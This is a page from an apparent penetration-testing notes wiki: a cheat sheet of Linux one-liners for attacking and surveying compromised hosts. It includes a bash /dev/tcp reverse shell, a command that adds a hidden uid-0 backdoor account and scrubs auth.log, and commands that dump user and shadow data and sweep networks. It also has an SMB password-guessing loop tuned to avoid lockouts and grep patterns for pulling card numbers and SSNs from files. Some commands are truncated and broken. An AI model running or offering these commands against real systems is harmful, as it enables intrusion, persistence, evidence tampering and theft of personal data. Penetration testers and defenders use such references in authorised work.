From BHaFSec Pentesting Notes Wiki
Jump to: navigation, search

Victim Info

id && /sbin/ifconfig && uname -a

Check outbound port egress

for ((i=1; i<1024; i++)) do nc -z -v $i | grep "Yep"; done

Reverse Shell

bash -i >& /dev/tcp/<IP>/<PORT> 0>&1

Transfer files through SSH

ssh <USER>@<HOST/IP> "cat test.tar.gz" > test.tar.gz

root useradd one-liner

USERNAME="name";PASSWD=`perl -e 'print crypt("password", "sa")'`;COMMENT="Comment Here" && sudo useradd -p $PASSWD --system --shell '/bin/bash' --base-dir "/bin" --uid 0 --non-unique --comment $COMMENT $USERNAME && sudo sed -i '/useradd/d;/$USERNAME/d;' /var/log/auth.log

List all uid’s and respective group memberships

for i in $(cat /etc/passwd 2>/dev/null| cut -d":" -f1 2>/dev/null);do id $i;done 2>/dev/null

List all super user accounts

grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}'

Can the current user run any ‘interesting’ binaries as root and if so also display the binary permissions etc.

sudo -l 2>/dev/null | grep -w 'nmap|perl|'awk'|'find'|'bash'|'sh'|'man'|'more'|'less'|'vi'|'vim'|'nc'|'netcat'|python|ruby|lua|irb' | xargs -r ls -la 2>/dev/null

External IP

join -o 1.1,2.2 -1 1 -2 1 -t: passwd shadow
echo "$( hostname --fqdn ) ($(hostname -i)):$( pwd )"
echo addr show|ip -o -b -|cut -d' ' -f2,7

Scan hosts quickly without NMAP

172.16.0.{1..254};do (ping -c1 $i > /dev/null && echo $_) &done > pinged-hosts


for ip in $(seq 1 254); do ping -c 1 192.168.1.$ip>/dev/null; [ $? -eq 0 ] && echo "192.168.1.$ip UP" || : ; done

Strip Credit Card Numbers from a file

grep '\([345]\{1\}[0-9]\{3\}\|6011\)\{1\}[ -]\?[0-9]\{4\}[ -]\?[0-9]\{2\}[-]\?[0-9]\{2\}[ -]\?[0-9]\{1,4\}' -o CCData.txt

Strip SSN's from a file

egrep "[0-9]{3}[-]?[0-9]{2}[-]?[0-9]{4}" file
grep '[0-9]\{3\}-[0-9]\{2\}-[0-9]\{4\}' -o ssn.txt

Strip Phone Numbers from a file

egrep “[(]?[2-9]{1}[0-9]{2}[)-. ]?[2-9]{1}[0-9]{2}[-. ]?[0-9]{4}” filename

Pipe Phone Numbers from a file to OpenCNAM and output CID+# to File

<numbers.txt xargs -I % curl -w "-%\n" >>output.txt


while read NUM; do curl$NUM?account_sid=SID&auth_token=TOKEN -w "-%\n" > results.txt < numbers.txt

Guess SMB passwords online without locking accounts. You need to know lockout threshold and observation window first.

for pass in $(cat passwords.txt); do msfcli auxiliary/scanner/smb/smb_login RHOSTS= SMBPASS=$pass USER_FILE=/users.txt SMBDOMAIN=x E; sleep 360; done

Combine multiple column'd text into one column (for example: output of "net users /domain"):

awk '{ for(i=1;i<=NF;i++){ print $i}}' inputfile.txt outputfile.txt

From @MrMindscrew - one-liner to use enum4linux from @portcullislabs and snag a username list:

enum4linux -U | grep "user:" | awk -F ":" ' { print $2 } ' | awk -F " " ' { print $1 } ' | sed 's/.*\[\([^]]*\)\].*/\1/g'

From "normal" nmap output, get list of IPs that do not enforce SMB signing:

awk '/^Nmap/ {a=$0} /signing disabled/ {print a}' filename.nmap | grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}'

From "grepable" nmap output, create one text file per open port, and include each IP with that port open in that text file:

awk '/^Host/ {for(i=3;i<=NF;i++){if(sub(/\/open\/.*/,"",$i))print$2>>(""$i"-open.txt");close(""$i"-open.txt");}}' svc.gnmap